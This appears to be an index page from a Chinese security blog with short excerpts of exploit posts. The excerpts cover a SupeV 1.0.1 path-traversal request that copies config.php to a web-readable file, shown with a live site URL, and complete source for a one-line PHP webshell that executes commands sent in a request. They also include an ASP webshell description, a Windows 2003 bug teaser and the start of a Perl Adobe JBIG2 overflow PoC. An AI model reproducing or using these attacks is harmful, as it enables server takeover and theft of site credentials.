远古视频点播系统的一个注入漏洞

作者:toby57

VIEWGOOD VOD视频点播系统 (WebVOD)
漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册
阅读全文 »

Tags: , , , , ,

SupeV 1.0.1 0DAY

# 鬼仔:作者留言纠正文中的错误

漏洞形成,直接以get方式请求
api/test.php?thumb=../config.php&vid=../../1会把config.php复制到根目录下1.jpg
这里写错了,应该是attachments\thumb\1.jpg写入倒了这里,向上跳4级才是根目录,这里只跳了2级,大家分析下代码就知道了,好多人都说利用不了,下面贴一个站出来给大家看
http://video.worlddiy.net/attachments\thumb\1.jpg
上次匆忙文章没写清楚,还望谅解

来源:WEB安全手册

感谢 ′&廢.的投递

大家好,我是无名

今天发布个discuz旗下产品 “视频播客 SupeV 1.0.1” 0day

漏洞文件:api目录下test.php

直接看代码
阅读全文 »

Tags: , , ,

一个发现多年现在还未修补的bug

# 鬼仔:今天把theme从三栏改成了两栏,又修改了一些细节。两栏的文章阅读区域更大,不知道大家喜欢三栏还是两栏。

作者:zodiacsoft

从来就没有公开过未修补的bug,庆祝今天中午吃到一个很甜的砂糖桔,公开一个05年发现现在还没有修补的中文windows2003的bug。
典型问题出现在quser.exe。query user也是一样的。
阅读全文 »

Tags: ,

隐藏并修改文件的最后修改时间的asp-webshell

作者:skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell。

源码:
阅读全文 »

Tags: , ,

一个新型的php一句话cmdshell(非一句话木马)

作者:skyfire[B.H.S.T]

源码:

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>

阅读全文 »

Tags: ,

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = “\x40\x00”;
my $factor = “ABCD”;
my $data = “A” x 8314;
阅读全文 »

Tags: , , ,

Multiple PDF Readers JBIG2 Local Buffer Overflow PoC

causes an exception at 41414141

http://milw0rm.com/sploits/2009-41414141.pdf

# milw0rm.com [2009-02-23]

Tags: ,

新的pdf 0day 在这里

来源:alert7

下面这个是老的。
http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/

新的pdf 0day 在这里
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
阅读全文 »

Tags: ,